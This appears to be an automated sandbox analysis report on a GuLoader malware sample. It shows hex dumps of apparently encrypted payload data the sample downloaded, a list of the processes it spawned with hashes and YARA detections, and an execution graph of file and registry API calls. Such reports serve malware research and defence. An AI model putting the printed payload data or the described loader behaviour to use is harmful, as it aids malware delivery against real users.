98 c8 6d 37 d2 eb 31 63 bb 90 eb e2 42 71 08 5b db 5d 5c 4d 1c e2 dc 05 9a 2b 36
                                                                                      Data Ascii: $/ac9o)WmI`!0N^PYA^Li8"SJM?f%i5qD[RLIka#8`6r"1z16&'Tb$PMG;'#eC,lsr+@uZ~`f$m+Vva3v^$.m71cBq[]\M+6
                                                                                      2022-05-26 20:56:18 UTC140INData Raw: 06 a5 52 be 97 9f 8b 2f 23 cd 86 c8 38 f1 15 de 32 39 81 20 19 a3 cf 76 43 45 38 5e 03 2e 1d 4e 40 15 fb 95 29 ef 23 e9 45 fa 4e 58 b7 be 82 04 ba df 81 67 47 fa 41 c6 33 2f c8 62 a3 e2 03 84 8f 18 3e 2f 5e 04 6f 1e 58 1b 2e ef 58 f2 4d 13 a6 04 ad 7a 42 f5 29 c0 74 a3 6a 10 8a e7 2b 24 07 78 e9 72 2a 32 4d 0c 7b 4b aa 3e ff e8 26 06 ff f2 76 f9 ab dc 90 35 96 a2 d4 de 2e b4 a8 6b 09 88 db c9 29 dd 91 a8 d9 64 0c 68 7a 7c 12 4a 39 72 a4 f2 47 2c e1 ed 36 bc 09 fa be 6e 07 71 ad 23 14 54 44 e1 5d cf a2 2b f9 8c d8 45 6d 47 63 63 83 52 49 9f 37 f7 c5 29 40 d2 2e 21 e2 73 6c e4 8d e7 4e 19 9a 08 c0 2e 92 2a a2 b6 a3 ef 5e 55 4c 49 51 6f 3b c1 48 1f 1d 5d 83 6b 53 93 96 d6 af 7b 4b 31 81 bf b0 77 c1 a5 98 48 af 6e 94 d5 6d 26 73 62 37 66 57 30 b5 87 88 c5 cf
                                                                                      Data Ascii: R/#829 vCE8^.N@)#ENXgGA3/b>/^oX.XMzB)tj+$xr*2M{K>&v5.k)dhz|J9rG,6nq#TD]+EmGccRI7)@.!slN.*^ULIQo;H]kS{K1wHnm&sb7fW0
                                                                                      2022-05-26 20:56:18 UTC144INData Raw: 85 25 e8 6d a2 fc e0 61 6f b7 14 da bf 86 f0 64 74 aa f4 f7 6b 0e da be 25 eb ef 71 4b 64 e3 f7 b7 ab d5 11 67 a3 ef 2e 5a 2b a1 62 28 35 bd 49 fe 6d d7 85 96 7d f0 7a b3 c7 b0 42 50 35 d5 5d 95 3a 3e cb 1f 12 c0 70 90 ed 6a 3b 93 57 fd a1 a8 b5 af d2 9f ba 10 10 02 4a 75 8b 92 c6 d5 8d f4 79 4c 28 60 66 ba 75 6c 56 7c 5f cc 50 6f 40 46 e4 03 31 25 45 fe 22 e4 a7 e4 d3 28 b9 dc dd 8a cf e9 41 8f 7a 75 c8 8a 84 70 27 45 4f ec eb f3 ac 33 cb bc c5 41 8f e4 3e 45 e7 13 2b c4 22 36 9c b3 2d 63 a4 dd 7a d6 6f 92 9c 06 c1 2f 0c 40 77 ee fb 76 65 95 38 25 fd 82 55 6b 72 60 ee e7 c7 02 e4 5f 87 f2 e7 2e 95 05 7d d4 e6 1a 28 27 47 01 79 5f 76 4a 7f b4 92 e2 af 97 9a 21 02 f1 ea 5f 61 bf b4 db 38 51 91 4c 4b 1e e5 90 4d 11 1a 9f 5f 46 fc a4 ce 2b 75 f4 a2 71 9c ef
                                                                                      Data Ascii: %maodtk%qKdg.Z+b(5Im}zBP5]:>pj;WJuyL(`fulV|_Po@F1%E"(Azup'EO3A>E+"6-czo/@wve8%Ukr`_.}('Gy_vJ!_a8QLKM_F+uq
                                                                                      2022-05-26 20:56:18 UTC148INData Raw: a8 79 33 e0 66 1e bf f0 02 00 d0 2e 2b 56 46 a2 64 2e 14 6a 6f e7 e5 74 a2 70 ad a9 79 91 74 ba 44 2a 23 fa ce 32 0a d5 b8 ba 22 a8 b4 3a b0 6a c4 2c 80 01 3d e7 10 0a d5 02 ab 3d 84 9a 62 aa 28 ad d6 6a 03 0b 97 a0 40 8e d4 72 92 72 9e 8f f8 be 32 29 67 7e f6 4e cf d7 51 c8 6b 16 a3 d3 51 7e 6e 9f 33 3b 7c af 6a 64 33 d7 4d e6 aa ea b8 ec 43 f2 0d 45 5f c0 b2 55 19 d3 10 db 93 3f 68 56 18 2c 50 e4 12 62 2a e4 90 22 46 4b b3 fe f7 00 2e 4d 3c bd 6e 8d 4c c4 5c be 46 8a 6f d6 e0 86 bc a5 dc fc 48 f0 22 4c 33 28 a7 f1 ba 65 4b 96 e4 2c f6 48 b8 2f 46 2a 0b b6 35 a8 c7 0e 86 0c d0 30 7e e3 75 df dd cd 1f 17 a0 83 64 45 8c 82 fc 57 6d 2e 04 8e e7 1e 83 c5 37 1f e9 be c9 dc ff 84 59 85 9a 9d b1 a4 a8 c3 ba 4c 82 c4 18 a7 e3 31 71 82 52 c4 44 fb b7 ac be e8 f5
                                                                                      Data Ascii: y3f.+VFd.jotpytD*#2":j,==b(j@rr2)g~NQkQ~n3;|jd3MCE_U?hV,Pb*"FK.M<nL\FoH"L3(eK,H/F*50~udEWm.7YL1qRD
                                                                                      2022-05-26 20:56:18 UTC152INData Raw: 23 0e 43 22 87 cb 52 7c 8c 7f 78 8c 9f 91 b0 a9 b2 7b dd 6b 74 ec 00 d8 70 87 f7 73 60 23 56 6d 40 c5 3c 84 42 59 00 81 9a 4c e8 a3 dc 78 27 68 83 f0 9d 58 30 33 02 0b b9 b3 2c c9 6e 8b ed 60 3b c1 85 fa 25 10 0e 6e 1f 13 af 60 43 87 38 b3 83 43 be ff 95 f7 11 64 f8 4e 19 ca 41 37 0a 5d e9 38 dc 29 90 86 e5 b8 68 e0 4a d6 a0 8f 79 c1 e4 11 ed 7b 46 88 1c f1 2f 65 64 0c 45 ac 2e 8c 59 89 07 ff f6 c5 40 02 21 65 d6 e7 47 ee 5f 8a 93 94 a9 42 19 41 da 05 6f fb b9 56 87 6b c8 bf f5 10 f2 7a 71 4d bf d1 fa 3d fd 9c 65 33 55 80 7e 76 47 66 bd fe e9 cc 5d 26 3d f4 51 11 3d 05 82 a2 29 fd 77 3c fb d4 3a 00 76 1a 0f c6 2a 0e 5c de 69 72 83 2b 8b 26 da dd 17 01 01 ec aa 77 73 48 bb ea 1a 48 d3 a2 99 aa 73 44 4c 7c 0c c6 4d 34 b8 03 1d 8b 66 9e 1a d3 71 ce cf f7 55
                                                                                      Data Ascii: #C"R|x{ktps`#Vm@<BYLx'hX03,n`;%n`C8CdNA7]8)hJy{F/edE.Y@!eG_BAoVkzqM=e3U~vGf]&=Q=)w<:v*\ir+&wsHHsDL|M4fqU
                                                                                      2022-05-26 20:56:18 UTC156INData Raw: f4 95 e8 8b 68 1b b0 9d ba 82 71 bb 61 e3 a7 07 f9 63 4a 7f 28 ca 4b ae de 6f 52 59 f2 cc c5 fc 01 f1 df db 8e bb 40 70 62 07 f1 f7 62 01 5e 44 a8 ce de 0c ab 2d 56 4b 4a 8d f8 63 72 d4 f1 46 06 6f b8 d6 9a 50 21 7a e6 0b 7e ae 69 f4 bb ae ad 6a 5f e4 17 6e 22 7f f8 5e ab 76 35 d2 15 da 3f 74 75 aa 25 c0 c4 78 9d e5 b9 c7 69 b8 dd c5 de d1 45 3f 53 ed 4f aa 73 b1 5c be 32 ec 3f 89 a7 e2 b8 fe 1a 56 24 b6 12 92 09 d4 23 f7 63 ad e7 df cf aa f0 2e 0d 18 c3 b5 c6 6b 7a 22 f3 be c7 fd d4 bb a4 65 7a 04 a4 2d dd d4 f1 ce 53 29 58 29 cf 5b 0f 5f b6 da 85 e7 99 da d4 45 de 0e eb 36 f7 e6 5e 59 d8 90 56 0d 90 af 40 d4 04 d8 36 9e 61 92 23 fb 2b f2 11 48 72 b2 38 4d 4b e7 07 47 e2 ad 6d ae 9c c0 aa be d3 b8 b0 92 82 2a fe a5 2b 48 64 99 db 04 95 75 0d af 90 12 3e
                                                                                      Data Ascii: hqacJ(KoRY@pbb^D-VKJcrFoP!z~ij_n"^v5?tu%xiE?SOs\2?V$#c.kz"ez-S)X)[_E6^YV@6a#+Hr8MKGm*+Hdu>
                                                                                      2022-05-26 20:56:18 UTC160INData Raw: 03 ff 49 90 78 a3 91 97 c2 95 df 6d 4c c5 9e 47 7e 6a 59 a5 03 e1 9c 9e f7 d1 5e 69 f4 a0 da 75 0b 23 67 fd a0 42 8b e0 ec 52 5e 61 9b c6 f8 cf e0 09 ab d1 70 30 bf 1d 73 c2 0e 86 1f 11 9f c8 63 8c 4b cd 63 cf fd 01 af 1c a7 c8 86 ce bc 3f 70 e6 58 0c fe 92 fe db a0 db 0b a4 24 57 f1 bb 16 e0 36 42 92 54 f2 b5 59 ef 6f ff 56 72 2d 39 bb 3e 27 47 d4 33 14 85 d2 e2 c6 b6 bd 1a 8e cb 41 68 e7 d8 88 0a b1 3d 9c dd f3 e0 60 0f 22 ab 83 e4 1f cc 9e 27 59 db e2 43 b0 4a a2 db b1 70 bc e3 b4 af ec c4 2b c5 32 da 8a ce 66 87 7e 5c 0d bd ab 95 ed 7b 22 8e 34 12 da 6f 41 0c 85 83 81 fa 3b 54 01 71 81 6a 9a 24 85 84 4d 25 7d e8 d9 6b 76 65 2e 37 1d 4b 7c b0 7f 2a ae 4f c0 23 b8 dc 29 75 40 ed 06 d2 cb 60 b8 d5 cb 72 36 87 9a e3 ea 92 86 4a 69 ff 2c 2f 0e 75 7f e9 4c
                                                                                      Data Ascii: IxmLG~jY^iu#gBR^ap0scKc?pX$W6BTYoVr-9>'G3Ah=`"'YCJp+2f~\{"4oA;Tqj$M%}kve.7K|*O#)u@`r6Ji,/uL
                                                                                      2022-05-26 20:56:18 UTC164INData Raw: b6 b6 95 17 f2 e5 9c 3b 3b a1 68 d7 b9 ff 81 de ce 5b 27 ed 87 1f 67 cf 12 ed 15 37 01 32 f5 79 ab e2 45 39 59 05 5f 9b 9e d4 e2 e7 78 69 94 cd aa 84 dd a6 1f a5 f6 77 05 0d df 8d 61 b0 7b 76 50 a4 cb f7 89 33 da 24 c8 54 b8 1c f9 12 a8 35 76 59 27 60 a4 b0 da fd 80 6e 21 e0 26 40 2d 77 e1 2b e6 83 8b a8 6a 0c c4 e9 2b 6b 4a 30 a7 a5 fd 52 2c b5 87 4f e5 48 c3 ed 71 09 bb b4 bd ab 44 b2 94 67 bc 8f 0f 9c d2 16 ef f4 14 8f 65 5d 97 3f 85 24 ec e4 6b c8 c7 b0 21 31 f4 e0 5a 81 9a c5 45 47 2b f3 49 44 76 82 20 c3 75 ee 96 bc bc ec 22 ef c1 c9 06 13 20 fb d2 09 0e a8 f9 6b 49 db 01 90 c8 1c f2 25 1f 89 76 3c 8a bb 58 e5 a0 5d d6 71 83 5d f7 85 0d 87 d4 1e e0 55 52 4e f5 79 db 1f 0a 67 82 93 83 cd 0e 27 dc 62 eb bc 83 2c 6e ba 66 46 2c de 0e 11 cd 56 17 d5 54
                                                                                      Data Ascii: ;;h['g72yE9Y_xiwa{vP3$T5vY'`n!&@-w+j+kJ0R,OHqDge]?$k!1ZEG+IDv u" kI%v<X]q]URNyg'b,nfF,VT
                                                                                      2022-05-26 20:56:18 UTC168INData Raw: a1 bb cf 83 a5 ce be 0f d8 bd f6 f0 6f 82 cd 3c ce 9b ed 2a 73 b9 78 91 4e 5b 2d db 75 a1 e7 a6 3e d1 6e a5 3c cc e6 ef ef 95 16 a0 2f 35 6e f4 3b 72 c0 5a 08 e3 e7 44 df 3e 9c 27 20 38 d4 b0 66 62 e1 a3 f6 ef 63 72 8d 30 6d ca 03 f6 39 50 2c 2a 6c 89 d7 5e 9f 5c 36 94 6f c8 b5 e3 53 85 ef 10 fd 03 d3 69 d3 fa 6a f1 05 80 cf 3f 22 b4 f1 ba 86 85 e1 75 ea cb c1 a6 a2 41 04 66 56 44 82 1e 69 5a a9 67 71 32 e8 92 d7 68 ea 7e 0e cb 51 ea 1f 3c fd 31 00 5c 4b b8 1b 61 87 bd 5b 7c ef f6 9c 46 18 68 ef c8 dd c5 63 ac 8f 20 a3 b3 a4 bd 9b 78 e7 68 d7 4d d6 7c 64 ae 4e 07 6a 8f 9d 41 69 9b 4a f5 40 b0 10 7c 99 cd 5d 63 d0 40 3d 39 8f 64 f4 8e 26 31 42 e7 a9 a8 98 ca 17 5d 83 c6 da 91 ed b8 f8 04 eb 4b 64 60 4d 02 57 75 af 6b 51 b2 1f 10 32 66 cd b2 bb e9 a3 1d 0d
                                                                                      Data Ascii: o<*sxN[-u>n</5n;rZD>' 8fbcr0m9P,*l^\6oSij?"uAfVDiZgq2h~Q<1\Ka[|Fhc xhM|dNjAiJ@|]c@=9d&1B]Kd`MWukQ2f
                                                                                      2022-05-26 20:56:18 UTC172INData Raw: 67 0e d6 2a b5 ad aa ca b0 04 c8 77 d6 17 71 3b ce 76 0d ca b4 8b 95 9b f9 ee 46 f3 86 b8 4c e4 94 0a 50 a2 61 b2 6c 1a 52 d2 b5 38 f0 2f 08 71 2b 25 3f 8d cb 6d fc bf ab 1e 6a 9d 73 43 47 b3 1a 20 80 13 1c 1b 9f e3 96 55 b7 8f 57 47 fa 90 d9 64 7c 1a f5 ca 81 40 72 38 ca bb e3 8f e0 f6 f3 e4 51 d8 2e 51 21 af 93 70 b9 e2 3a bc 9a b0 7f d8 f6 b5 1c 0f 26 e9 fe 19 ee 08 88 a6 02 e3 86 01 72 3d 5f 70 27 56 a3 ec e3 e2 76 61 ab 0c 82 07 9d 21 bc 8b 32 33 57 3d 8b 1a 06 54 e6 5f 51 85 90 55 43 af 1e bd a8 02 5f 89 ee e2 f8 56 6d b4 92 41 a5 20 92 ae 40 fe d5 ae bd 0b 6a a2 ff bf 51 6d 6b 78 84 c7 5f a7 f1 5c 17 98 f9 f4 4d a3 40 c4 f1 78 6e 49 2c 66 e3 11 6a 7b c5 69 54 e9 84 e9 95 4e a2 27 d1 bd 77 58 15 4d bb 93 86 f8 be 01 9c d6 24 8c ff bf 5e 31 d9 4d a9
                                                                                      Data Ascii: g*wq;vFLPalR8/q+%?mjsCG UWGd|@r8Q.Q!p:&r=_p'Vva!23W=T_QUC_VmA @jQmkx_\M@xnI,fj{iTN'wXM$^1M
                                                                                      2022-05-26 20:56:18 UTC176INData Raw: 3d ec cd e3 04 ad 67 fe 9f c4 ec 8b e3 39 5f 5d 87 fb 6a 5d 2a 1b d1 08 61 7b 11 0d c2 a8 f1 0e 07 ef e4 8c 9d 75 63 82 75 d5 3e eb 80 1f a0 39 ec d6 99 d8 a1 02 b4 ed e8 92 f6 71 f6 58 8d 49 fc d5 d3 63 0e 49 de de 2c 3b 7f ba 88 41 17 a3 1c 37 e1 a4 be c0 f0 a9 e7 b0 4a 46 fe 22 ac dd fe bc 15 83 58 02 9f 84 87 bc f0 56 26 39 06 62 3e 93 85 1c 02 68 7f 83 22 12 b2 23 12 3c a3 4f bb 53 da f4 20 fc dc 9c 81 db 33 2f 7f 59 e5 f0 8d 84 dd e5 81 58 89 3d 0a 4b 0b 0c 7c 91 2f 68 fe b9 50 76 ad e7 96 7d 27 6b 54 2b 73 08 d5 18 af 19 aa ed da 91 a3 bf 24 1f 37 b7 6f 7f 7d ff 25 43 48 8a 65 8a c9 b1 fa 21 db 56 5c 4e 67 ce 90 7e 40 4b db 4a 89 96 7b 65 0d 8c 12 ab bf 54 9e 8b f0 17 11 6e 76 06 db 34 0c 69 be fd f5 11 3b 10 44 97 84 04 ee 2d 82 fe 34 42 44 f2 8f
                                                                                      Data Ascii: =g9_]j]*a{ucu>9qXIcI,;A7JF"XV&9b>h"#<OS 3/YX=K|/hPv}'kT+s$7o}%CHe!V\Ng~@KJ{eTnv4i;D-4BD
                                                                                      2022-05-26 20:56:18 UTC180INData Raw: 35 c6 3b 06 50 bb 1b 01 a1 1d 04 81 fd 25 64 70 36 b6 fd fc ce 59 5f 4c 74 b9 53 a1 14 e6 28 3a db f7 bd ad 5a ee 02 5d f5 dd 0d 82 53 7b 89 ff be 7a 25 c4 d5 7d 2c a2 6e 7a dc aa dc 3b b3 c5 03 99 2d f5 4f 45 15 5e 9b f9 bc de f1 6f 93 ac 04 5f f8 82 a2 7c d7 55 b0 cd 6b 04 e7 11 51 9c 29 b6 f1 0c 59 d8 8d 43 f4 c2 19 bf 46 0f 91 07 fe 0b 2c 72 06 58 ec 48 0b 9b 82 b8 45 70 ee 4a 85 4f 98 b8 45 3b 89 2d 55 33 10 e8 66 9e e7 73 36 57 2b 22 cc 56 e9 cd 4e 23 90 09 e6 1c 29 8e 93 41 70 65 d6 dc 35 6f e2 fe 7b a6 bb 66 1a a6 d7 a9 cd c7 9c 24 91 58 13 0f 3d d4 7a 8f b5 8e 4d 88 2f bd 07 7c ff ea 4b 84 06 2d 9e d0 07 b8 b5 a0 dc f9 26 1e 96 be 0a 95 41 f8 f9 de 30 9d 23 2a 9c 9d ee 09 75 ea 42 e3 98 e1 93 ed 35 47 1c 26 6b 32 bc 23 0c fd 08 34 b9 e1 49 f7 98
                                                                                      Data Ascii: 5;P%dp6Y_LtS(:Z]S{z%},nz;-OE^o_|UkQ)YCF,rXHEpJOE;-U3fs6W+"VN#)Ape5o{f$X=zM/|K-&A0#*uB5G&k2#4I
                                                                                      2022-05-26 20:56:18 UTC184INData Raw: 09 a5 b8 3f 8d 87 0f bb 75 0b 54 a7 5f 11 4a f0 52 1e e0 da fa 82 ee 98 2d 92 60 fe c6 0d b3 d1 32 d0 42 27 33 d9 1d b6 b8 ad 8b 69 f5 52 bd e4 b5 2b 88 d0 f5 14 88 ee 84 4c fe e3 fe 30 36 fc ea 3c 1f 83 9b 0c 7b b7 45 89 cb 00 bb 8a 64 70 26 25 ac c2 32 fe f9 e8 03 c6 f1 23 1e 17 34 de 87 dd d9 6a 7f 68 7f f0 5b 7f f1 90 c3 76 18 3c 75 ca 7b f0 39 55 95 3e 7e a5 8a f1 54 04 2c ee 51 b0 43 53 bf 99 59 05 08 18 67 31 e0 ad 50 06 10 07 e9 33 45 1d 73 aa d5 45 ab 1e 02 0a d1 8d b1 b9 ab 5f 12 ab 0e aa 85 d3 ec 86 31 70 11 8d cd f2 12 43 dc dd 06 43 21 9d 01 f7 3d af 75 1d 01 e1 24 4d b5 2d 59 3f 9f 00 24 e8 09 54 bc 1f e6 0d 8d 3f 92 58 fc 1e f9 43 73 f7 d0 84 47 2f 24 6c 97 e1 fb a9 0a 43 0f e0 d7 21 7c c6 e9 e8 14 2a e3 07 a4 44 07 2d 77 5f 76 16 ef 81 e1
                                                                                      Data Ascii: ?uT_JR-`2B'3iR+L06<{Edp&%2#4jh[v<u{9U>~T,QCSYg1P3EsE_1pCC!=u$M-Y?$T?XCsG/$lC!|*D-w_v
                                                                                      2022-05-26 20:56:18 UTC188INData Raw: de 09 cd 9d 90 f4 80 4a 66 6d 33 04 60 d1 2a dd 7e f4 9a a3 fb b8 96 e8 80 de f7 6a 4b d6 16 98 60 17 9a 30 31 af f8 aa 1b 65 67 b8 b4 e4 bc 92 9d e4 62 99 84 40 ef e8 06 c1 2c 2d dd 14 74 c1 39 39 e5 4d e9 0a e0 e5 59 4a 02 10 fb 5b 96 6c 08 d0 6f d5 b5 71 18 66 84 2b cb 19 a4 3b 26 3f f6 e7 d9 e4 e3 80 25 f8 99 0e c1 9b 73 4d 6b e0 66 43 15 72 1e 48 2d 7f 3e 28 24 20 ee 47 1d 79 2d ce 44 93 da 74 6d 3a 9e 21 ed 4f e2 27 cf c3 0a 36 a1 e1 38 d0 d7 4a 96 c8 f8 08 db e2 88 67 71 bb 57 84 73 e8 2e 61 d7 49 3f 54 f9 18 84 a5 66 26 59 d0 1a bc 99 71 87 94 84 77 fb c3 04 73 a2 97 c8 84 bc d8 a4 2b b5 f8 95 52 af d8 d4 aa 2c 44 2a be 89 72 6d 34 31 52 bf 29 79 b7 3b 2e f2 1d 3b 65 e4 03 29 10 b1 f5 06 b0 8e a0 d0 36 9f 6c 55 37 48 52 55 ea 8e 7e cb 50 16 43 9d
                                                                                      Data Ascii: Jfm3`*~jK`01egb@,-t99MYJ[loqf+;&?%sMkfCrH->($ Gy-Dtm:!O'68JgqWs.aI?Tf&Yqws+R,D*rm41R)y;.;e)6lU7HRU~PC
                                                                                      2022-05-26 20:56:18 UTC192INData Raw: 94 f2 6a 83 09 cf 4d a8 c1 9b e3 eb 19 b3 fe 8c a9 c3 6d 0e 09 5b 80 39 2f a6 1f 69 e5 a8 13 6b e6 6c 87 89 a0 4c 8b e5 85 60 97 9f 7c 13 7a 89 1c 90 d8 db c3 da 09 6d b1 d0 44 15 78 13 12 5a 71 0b bd 0d 93 56 40 e1 ff 60 e4 5d bc b4 99 51 b7 2a 17 4e ea ed f8 99 0f ac a3 9b 9c ac 0f 52 6d 11 e4 4b 3f d4 f4 99 e6 e9 88 3b 90 34 0d dd 32 66 6c 37 b3 57 03 54 28 2e 5c d2 cf 3a a4 f5 1a b6 bc 54 34 5d d3 ce da b4 2b 64 21 02 b4 88 78 57 24 40 62 fc a3 95 2c 66 bf 89 1f 5d c8 a2 b8 26 a0 11 7c dc 9a 7c 00 44 8c 95 1f be be 55 30 0b e4 44 c1 d3 af 6f 9c 70 0a b5 21 4a 40 28 e1 20 44 4e 72 21 6e d5 14 34 ee b7 ac 59 86 d2 de 28 6b 96 84 74 9c cc 9f cf a8 ff 9f 12 8e fa 3a 51 b5 51 78 9b f0 4e 2e 87 01 ef 14 dc 51 9d 8d 09 b9 00 ce b7 bd 2d 45 f9 20 e1 09 08 2c
                                                                                      Data Ascii: jMm[9/iklL`|zmDxZqV@`]Q*NRmK?;42fl7WT(.\:T4]+d!xW$@b,f]&||DU0Dop!J@( DNr!n4Y(kt:QQxN.Q-E ,
                                                                                      2022-05-26 20:56:18 UTC196INData Raw: 8a d4 cf b3 33 82 94 d1 f6 40 1f 59 fe 52 3f f6 0d 25 82 86 91 de 7f 22 a3 44 a5 f4 c2 58 49 26 0f 02 c1 c9 58 54 81 f4 48 4a 1f e4 7a 54 30 1a 58 29 de bb 65 be f6 a2 27 e8 f2 e1 1b 22 83 be 3d f4 77 6b 51 03 d3 cf f8 f9 91 b0 ee be ce c1 bd 29 bf d2 c1 20 36 6c 5a de 69 01 20 e2 32 af c6 85 80 de 7e 60 54 41 a0 59 c2 19 22 00 98 60 88 99 79 ac ef 39 bf 10 a0 53 38 e6 dd 6d f2 a7 91 6f 93 b0 d5 ef 61 f2 f0 ac 19 73 c1 34 98 48 e3 12 5b 61 93 98 ad b6 e2 e9 12 67 40 6f 9d fe 32 20 56 90 9c 5f ec b9 d1 b3 e7 76 8e 3a e7 2d e1 78 9a 5b 8d 31 df 95 cd 10 1a c0 59 f9 13 44 84 af d1 57 3f 92 cc bc cf 30 b7 04 12 f3 f6 fc 08 14 ae 8d e2 cd 70 f2 79 99 99 23 23 3c 68 d1 62 dd 78 49 e9 fb ef da 6c fd 21 cb 3b a6 46 dc ca 7f 82 f5 1a f8 a3 96 86 81 6c 50 20 5a e0
                                                                                      Data Ascii: 3@YR?%"DXI&XTHJzT0X)e'"=wkQ) 6lZi 2~`TAY"`y9S8moas4H[ag@o2 V_v:-x[1YDW?0py##<hbxIl!;FlP Z
                                                                                      2022-05-26 20:56:18 UTC200INData Raw: e0 83 ea 9b 1e df 6a f8 57 2f c8 be 44 49 92 0c 1d 6f 76 89 5b 3e 14 b0 94 9c a5 dc 63 f7 4d 64 f9 10 d0 3a fa 06 3c 63 76 d7 bf f4 58 e6 d1 4a 7b ab b4 7e ea 4b a8 d1 3d 13 cf fd 89 95 8f 44 2d db 9f 6a 13 d0 20 68 b8 52 10 9b 08 a4 59 bc 14 dd 17 5e c1 0b 8c e0 74 96 d0 30 f0 ef ed 4e b5 76 f6 8f 8c 03 2b e0 cd 36 01 52 07 58 9b 29 45 31 06 3c 8b ea 27 c6 43 48 cc ce 3d 91 b3 13 69 85 82 1e ad 39 75 fa 64 e4 e8 51 7e 7f 30 21 5a 37 0a 09 61 f6 3e fd 20 ad 62 4f 87 33 10 49 1a f1 bf 85 57 4b f5 b7 92 dd b7 8a c3 54 e3 b5 7b c3 e6 9a c0 6c de 44 6d 8e d6 5a b1 f3 92 47 36 27 99 42 91 b3 45 90 ac ab 77 28 24 a7 53 37 03 fe 0b 85 5d 96 ff a9 ac a4 7e 36 9e a9 3f d4 d1 6c ca a4 04 bc c9 d6 ec 61 7d f5 4e 90 1c 49 68 ba 69 13 3d 7c ff 66 f1 34 45 e4 c7 8b 03
                                                                                      Data Ascii: jW/DIov[>cMd:<cvXJ{~K=D-j hRY^t0Nv+6RX)E1<'CH=i9udQ~0!Z7a> bO3IWKT{lDmZG6'BEw($S7]~6?la}NIhi=|f4E


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:2
                                                                                      Start time:22:55:45
                                                                                      Start date:26/05/2022
                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1000520 bytes
                                                                                      MD5 hash:BE43B751BD103FE5A64B4E0AA7A30060
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Target ID:4
                                                                                      Start time:22:56:01
                                                                                      Start date:26/05/2022
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe"
                                                                                      Imagebase:0x10000
                                                                                      File size:106496 bytes
                                                                                      MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.213653060266.0000000000630000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate

                                                                                      Target ID:5
                                                                                      Start time:22:56:01
                                                                                      Start date:26/05/2022
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff651080000
                                                                                      File size:875008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.6%
                                                                                        Dynamic/Decrypted Code Coverage:16.4%
                                                                                        Signature Coverage:18.5%
                                                                                        Total number of Nodes:1889
                                                                                        Total number of Limit Nodes:46
                                                                                        execution_graph 8383 401941 8384 401943 8383->8384 8389 402da6 8384->8389 8390 402db2 8389->8390 8435 40657a 8390->8435 8393 401948 8395 405c49 8393->8395 8477 405f14 8395->8477 8398 405c71 DeleteFileW 8400 401951 8398->8400 8399 405c88 8401 405db3 8399->8401 8491 40653d lstrcpynW 8399->8491 8401->8400 8520 406873 FindFirstFileW 8401->8520 8403 405cae 8404 405cc1 8403->8404 8405 405cb4 lstrcatW 8403->8405 8492 405e58 lstrlenW 8404->8492 8407 405cc7 8405->8407 8410 405cd7 lstrcatW 8407->8410 8411 405ccd 8407->8411 8412 405ce2 lstrlenW FindFirstFileW 8410->8412 8411->8410 8411->8412 8414 405da8 8412->8414 8433 405d04 8412->8433 8413 405dd1 8523 405e0c lstrlenW CharPrevW 8413->8523 8414->8401 8417 405d8b FindNextFileW 8421 405da1 FindClose 8417->8421 8417->8433 8418 405c01 5 API calls 8420 405de3 8418->8420 8422 405de7 8420->8422 8423 405dfd 8420->8423 8421->8414 8422->8400 8426 40559f 24 API calls 8422->8426 8425 40559f 24 API calls 8423->8425 8425->8400 8428 405df4 8426->8428 8427 405c49 60 API calls 8427->8433 8430 4062fd 36 API calls 8428->8430 8429 40559f 24 API calls 8429->8417 8432 405dfb 8430->8432 8432->8400 8433->8417 8433->8427 8433->8429 8496 40653d lstrcpynW 8433->8496 8497 405c01 8433->8497 8505 40559f 8433->8505 8516 4062fd MoveFileExW 8433->8516 8437 406587 8435->8437 8436 4067aa 8438 402dd3 8436->8438 8468 40653d lstrcpynW 8436->8468 8437->8436 8440 406778 lstrlenW 8437->8440 8443 40657a 10 API calls 8437->8443 8444 40668f GetSystemDirectoryW 8437->8444 8446 4066a2 GetWindowsDirectoryW 8437->8446 8447 406719 lstrcatW 8437->8447 8448 40657a 10 API calls 8437->8448 8449 4067c4 5 API calls 8437->8449 8450 4066d1 SHGetSpecialFolderLocation 8437->8450 8461 40640b 8437->8461 8466 406484 wsprintfW 8437->8466 8467 40653d lstrcpynW 8437->8467 8438->8393 8452 4067c4 8438->8452 8440->8437 8443->8440 8444->8437 8446->8437 8447->8437 8448->8437 8449->8437 8450->8437 8451 4066e9 SHGetPathFromIDListW CoTaskMemFree 8450->8451 8451->8437 8455 4067d1 8452->8455 8453 406847 8454 40684c CharPrevW 8453->8454 8457 40686d 8453->8457 8454->8453 8455->8453 8456 40683a CharNextW 8455->8456 8459 406826 CharNextW 8455->8459 8460 406835 CharNextW 8455->8460 8473 405e39 8455->8473 8456->8453 8456->8455 8457->8393 8459->8455 8460->8456 8469 4063aa 8461->8469 8464 40646f 8464->8437 8465 40643f RegQueryValueExW RegCloseKey 